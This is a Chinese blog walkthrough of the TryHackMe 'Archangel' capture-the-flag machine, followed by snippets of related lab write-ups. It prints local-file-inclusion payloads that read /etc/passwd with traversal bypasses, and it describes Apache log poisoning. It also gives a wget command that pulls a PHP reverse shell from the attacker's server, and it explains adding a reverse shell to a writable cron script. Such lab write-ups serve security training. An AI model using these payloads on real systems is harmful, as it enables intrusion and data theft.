TryHackMe - Archangel靶场

最新推荐文章于 2024-06-01 09:33:37 发布
最新推荐文章于 2024-06-01 09:33:37 发布
阅读量278 收藏 1
点赞数
分类专栏: Try Hack Me靶机 文章标签: 渗透测试 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44101248/article/details/113957607
版权

Archangel

Boot2root, Web exploitation, Privilege escalation, LFI

0x01 信息收集

常规端口扫一波,发现只有22和80端口开放
 
先从80端口入手,常规的扫目录没有发现有价值的东西
 
在源代码里发现一个可以的域名
 
网站找不到突破口,试着修改本地的hosts文件指向改域名,访问后获得第一个flag
 
在用gobuster扫描网站目录,得到test.php和robots.txt
robots.txt里面指的也是test.php
 

0x02 文件包含

打开test.php看路径像是有文件包含的漏洞
 
用php伪协议包含到test.php文件
php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php
分析源代码if需要满足两个条件没有../..和 /var/www/html/development_testing
 
根据条件读取/etc/passwd
php://filter/resource=/var/www/html/development_testing/..//..//..//..//..//..//..//..//..//..//..//etc/passwd
也可以用.././.././绕过
..%2f/..%2f/..%2f/也能绕过
 
尝试包含apache日志getshell
 
在User-Agent里插入phpinfo函数测试一下
 
成功解析

 

0x03 GetShell

插入system执行命令函数
 
给cmd传参成功执行,接下来就是用kali自带的php反向shell脚本getshell
 
修改文件的反向链接的地址和端口
 
用python3搭建一个简单的网站
python3 -m http.server 4444
执行函数用wget 下载脚本 wget http://10.10.220.123:4444/php-serverse-shell.php
 
下载成功后在同级目录下访问php-reverse-shell.php
访问前记得先用nc起监听
 

0x04 权限提升

shell过来后准备提权,现先翻一下可以提权的脚本,发现/etc/crontab目录下有helloworld.sh以archanggel用户自动运行的脚本
 
过去看下是个自动运行的sh文件,具有可读可写权限。在文件后面添加反弹shell的命令。
 
稍等片刻便能获得archangel权限
z4yn:)
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
tryhackme
03-08
tryhackme
TryHackMe - magician靶场
z4yn:)的博客
03-12 255
magician CVE-2016–3714 This magical website lets you convert image file formats 0x01 信息收集 Nmap扫描端口开放服务,开放了21,8080,8081端口 根据靶场提示要把ip指向域名:magician 0x02 漏洞利用(CVE-2016–3714) 先访问21端口,有个匿名访问,被做了点手脚“延迟”。登录进去里面是空的,根据提示访问https://imagetragick.com. 根据给的..
探索网络安全的宝藏:TryHackMe CTF 收录库
最新发布
gitblog_00086的博客
06-01 449
探索网络安全的宝藏:TryHackMe CTF 收录库 项目地址:https://gitcode.com/edoardottt/tryhackme-ctf 在网络安全的世界中,不断学习和实践是保持敏锐的关键。TryHackMe 是一个极好的在线平台,它提供了各种安全训练靶机,帮助你在安全环境中提升自己的黑客防御和攻击技能。而今天我们要向您推荐的是由顶级用户 edoardottt 创建的一个特别资源...
TryHackMe - Thompson靶场
z4yn:)的博客
03-11 234
Thompson boot2root machine for FIT and bsides guatemala CTF 目录 0x01 Nmap信息收集 0x02 漏洞利用 0x03 GETshell 0x04 ROOT 0x01 Nmap信息收集 使用Nmap队目标机器进行端口服务探测扫描 0x02 漏洞利用 根据Nmap扫描结果分析,突破口应该在8080Tomcat上 根据版本分析有个CVE-2020-1938但作用不大,读取不到有用的信息。 Tomcat...
tryhackme--Blog
qq_45414878的博客
11-15 366
tryhackme–Tony the Tiger
jira-archangel
03-20
吉拉大天使 部署事件工单创建 argocd notify argo wf event ┌───────────────┐ ┌───────────────┐ │ │ │ │ │ │ │ │ │ ├───────► webhook │ ...
大天使之剑java源码-archangel-web:大天使网
06-06
Archangel DLT poc 的 Web 客户端界面。 有两个部分: 简单查询和上传单页webapp。 这是使用 React 用 Ja​​vaScript 编写的。 一个很小的后端,围绕国家档案馆的工具抛出一个最小的 Web API。 前端将文件上传到...
大天使之剑java源码-Archangel:软件开发类项目
06-06
Archangel 是一个提供有关污染的单一资源的网站。 它从许多其他来源收集有关不同类型污染以及您如何对各种原因做出贡献的信息。 它旨在传播对导致污染的不同因素的认识,并与有助于解决问题的慈善机构和技术建立联系...
大天使之剑java源码-ArchAngel_J2ME:J2ME大天使游戏
06-06
《大天使之剑Java源码解析——探索J2ME游戏开发技术》 “大天使之剑”是一款基于Java平台,特别是J2ME(Java 2 Micro Edition)开发的移动游戏。J2ME作为Java的一个子集,主要用于嵌入式设备和移动设备上的应用程序...
大天使之剑java源码-superacao-app-archangel:superacao-app-大天使
06-06
大天使之剑 java源码最低限度的知识 节点 打字稿 角 2 离子 2 火力基地 基本设置 该应用程序是使用 Ionic 2 框架使用 TypeScript 语言开发的。要在您的机器上安装 Ionic,您需要在您的机器上安装带有 ...s
tryhackme--Wgel CTF
qq_45414878的博客
10-23 406
tryhackme--Wgel CTFnmapid_rsa信息泄漏wget的sudo提权 nmap 简单扫描靶机的服务 nmap -T4 -sS -sV 10.10.247.24 深度扫描也没没有什么可以直接利用的漏洞 目标机器为linux主机,并且目标主机开放了两个端口:22、80。 端口 服务 22 ssh 80 http id_rsa信息泄漏 访问80端口,发现为apache的默认页面,查看页面源代码,发现一句很有趣的话,其中 Jessie 可能为用户名 用dirsear
Tryhackme-Wonderland
个人博客
09-14 416
Wonderland 文章目录WonderlandWonderlandTask1 Capture the flagsPerlCapabilitiesLooking GlassTask1 Looking Glass Wonderland Task1 Capture the flags nmap扫描发现开启22端口和80端口 80端口进行目录扫描,未发现突破口 下载/img/white_rabbit_1.jpg,使用steghide提取隐藏文件,得到提示follow the r a b b i t,尝试访
TryHackMe - Tony the Tiger靶场
z4yn:)的博客
03-09 179
Tony the Tiger Learn how to use a Java Serialisation attack in this boot-to-root CVE-2015-7501 0x01 信息收集 先用Nmap扫描目标机端口,开放了不少端口。 任务1是到80端口拿一个flag 80端口搭建一个博客,常规扫目录没有发现有价值的东西。 查看页面源代码也没有发现线索,只剩下两篇博客的两张配图了 wget 把两张图片下载下来用steghide进行提取 ...
TryHackMe - Kenobi,全球最火的程序员学习路线
m0_60721860的博客
04-06 617
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
Tryhackme-Kenobi靶机
MSB_WLAQ的博客
10-06 513
前言 一个国外的渗透学习网站,补基础知识点还是不错的,适合新人学习网络安全(因为学习项目里有提示)。 知识点 可直接开启web的虚拟机[非会员每天只有一个小时],也可以使用VPN连接(个人建议还是用VPN爽点,毕竟自己的机子工具啥的用起来方便)。 samba Samba是适用于和Unix的标准Windows互操作性程序套件。它允许最终用户访问和使用公司内联网或互联网上的文件、打印机和其他常见共享资源。它通常被称为网络文件系统。 Samba基于服务器消息块 (SMB) 的通用客户端/服.
TryHackMe - Steel Mountain
Yin520的博客
03-23 765
侵入一台 Windows 机器。使用metasploit进行初始访问,并利用powershell进行Windows权限提升枚举,并学习一种新技术来获得管理员访问权限。
TryHackMe新手村
weixin_55154296的博客
04-17 7609
TryHackMe 最近在外网发现了一个在线黑客学习网站:TryHackMe ,缺点是好像需要一些上网技巧,而且全英,免费用户每天只能用一小时,付费(大概一个月6、70)无限制. 以下附上刚入门时的坑 在tutorial的第一个问题,问的是 Follow the steps in this task. What is the flag text shown on the website of the machine you started on this task? 意思我都读懂了,但是我填flag、c
Tryhackme - Retro
冬萍子癸水
05-28 1125
1 扫描 80进网页搜集信息,3389是远程控制端口 可以xfreerdp /u:wade /v:10.10.140.239然后远程控制桌面。但是要知道密码。或者用别的方法登进去。 C:\root> masscan -p1-65535,U:1-65535 10.10.140.239 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-05-28 00:41:40 GMT -- forced optio
TryHackMe-Binex
M1n9K1n9的博客
03-02 514
枚举计算机并获取交互式 shell。利用 SUID 位文件,使用 GNU 调试器利用缓冲区溢出并通过 PATH 操作获得根访问权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值